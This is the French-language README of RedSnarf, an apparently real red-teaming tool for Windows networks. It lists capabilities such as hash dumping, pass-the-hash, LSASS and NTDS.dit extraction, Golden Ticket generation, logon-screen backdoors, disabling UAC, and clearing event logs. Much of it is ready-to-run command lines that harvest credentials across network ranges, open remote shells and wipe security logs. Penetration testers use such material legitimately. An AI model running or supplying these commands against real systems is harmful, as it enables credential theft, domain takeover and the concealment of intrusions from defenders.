
RedSnarf est un outil de test d'intrusion / red teaming pour environnements Windows.
______ .____________ _____
\______ \ ____ __| _/ _____/ ____ _____ ________/ ____\
| _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\
| | \ ___// /_/ |/ \ | \/ __ \| | \/| |
|____|_ /\___ >____ /_______ /___| (____ /__| |__|
\/ \/ \/ \/ \/ \/
[email protected]
@redsnarf
RedSnarf est un outil de test d'intrusion / red-teaming par Ed Williams pour récupérer les hashs et les identifiants à partir de postes de travail Windows, serveurs et contrôleurs de domaine en utilisant des techniques OpSec sûres.
Voir notre chaîne YouTube pour les vidéos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
Les fonctionnalités de RedSnarf incluent :
• Récupération des hashs SAM locaux
• Énumération des utilisateurs s'exécutant avec des privilèges système élevés et leur mot de passe LSA secrets correspondant ;
• Récupération des credentials en cache MS ;
• Pass-the-hash ;
• Identification rapide des combinaisons nom d'utilisateur/mot de passe faibles et devinables (par défaut administrator/Password01) ;
• Capacité de récupérer les hashs sur une plage ;
• Hash spraying -
Credsfile acceptera un mélange de pwdump, fgdump et de nom d'utilisateur et mot de passe en texte clair séparés par un espace ;
• Dump de Lsass pour analyse hors ligne avec Mimikatz ;
• Dump des hashs du contrôleur de domaine en utilisant NTDSUtil et récupération de NTDS.dit pour analyse locale ;
• Dump des hashs du contrôleur de domaine en utilisant la méthode drsuapi ;
• Récupération du dossier Scripts and Policies d'un contrôleur de domaine et analyse pour 'password' et 'administrator' ;
• Capacité à déchiffrer les hashs cpassword ;
• Capacité à lancer un shell sur une machine distante ;
• Capacité d'effacer les journaux d'événements (application, sécurité, installation ou système) ; (Version interne uniquement)
• Les résultats sont enregistrés par hôte pour analyse.
• Activer/Désactiver RDP sur une machine distante.
• Changer le port RDP de 3389 à 443 sur une machine distante.
• Activer/Désactiver NLA sur une machine distante.
• Trouver où les utilisateurs sont connectés sur des machines distantes.
• Backdoor de l'écran de connexion Windows
• Activer/Désactiver UAC sur une machine distante.
• Stealth mimikatz ajouté.
• Analyse des hashs de domaine
• Capacité à déterminer quels comptes sont activés/désactivés
• Prendre une capture d'écran du bureau de l'utilisateur actif connecté à distance
• Enregistrer le bureau de l'utilisateur actif connecté à distance
• Déchiffrer Windows CPassword
• Déchiffrer le mot de passe WinSCP
• Obtenir les SPN des utilisateurs
• Récupérer les mots de passe WIFI depuis des machines distantes
Prérequis :
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Récupération de Lsass en utilisant procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - utilisé pour l'analyse locale des informations Mimikatz
Afficher l'aide
./redsnarf.py -h
./redsnarf.py --help
Récupérer les hashs locaux d'une seule machine en utilisant des identifiants locaux faibles et en effaçant le journal des événements de sécurité
./redsnarf.py -H ip=10.0.0.50 -uC security
Récupérer les hashs locaux d'une seule machine en utilisant des identifiants locaux faibles et en effaçant le journal des événements d'application
./redsnarf.py -H ip=10.0.0.50 -uC application
Récupérer les hashs locaux d'une seule machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Récupérer les hashs locaux d'une seule machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
Pulvériser des hashs sur une plage réseau
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Récupérer les hashs sur une plage réseau avec connexion de domaine
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
Vérifier rapidement les identifiants
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Vérifier rapidement un fichier contenant des noms d'utilisateur (-hS) et un mot de passe générique (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
Récupérer les hashs en utilisant la méthode drsuapi (la plus rapide)
Cette méthode prend en charge un indicateur optionnel -q y qui interrogera LDAP et affichera si les comptes sont actifs ou désactivés
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
Récupérer les hashs en utilisant NTDSUtil
Cette méthode prend en charge un indicateur optionnel -q y qui interrogera LDAP et affichera si les comptes sont actifs ou désactivés
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
Génération de Golden Ticket
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
Copier le dossier Policies and Scripts d'un contrôleur de domaine et analyser pour 'password' et 'administrator'
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Déchiffrer Cpassword
./redsnarf.py -uG cpassword
Trouver un utilisateur - En ligne
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
Trouver un utilisateur - Hors ligne (recherche dans les informations pré-téléchargées)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
Afficher la liste des tâches NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
Capture d'écran du bureau d'un utilisateur actif connecté à distance
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
Lancer un shell sur une machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Lancer un shell sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Récupérer une copie de lsass pour analyse hors ligne avec Mimikatz sur une machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y